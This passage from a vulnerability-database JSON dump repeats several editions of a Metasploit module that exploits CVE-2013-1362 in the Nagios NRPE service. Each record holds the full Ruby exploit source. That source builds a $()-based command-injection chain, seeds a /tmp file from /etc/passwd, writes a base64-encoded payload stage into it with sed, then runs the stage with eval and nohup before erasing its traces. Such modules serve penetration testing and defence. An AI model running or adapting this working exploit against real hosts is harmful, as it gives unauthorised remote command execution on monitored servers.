packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-17T01:17:44", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-17T03:15:35", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-17T03:15:35", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-23T15:37:36", "history": [], "viewCount": 14, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-23T15:37:36", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-10-23T19:39:02", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-10-23T19:39:02", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-01T09:38:44", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": 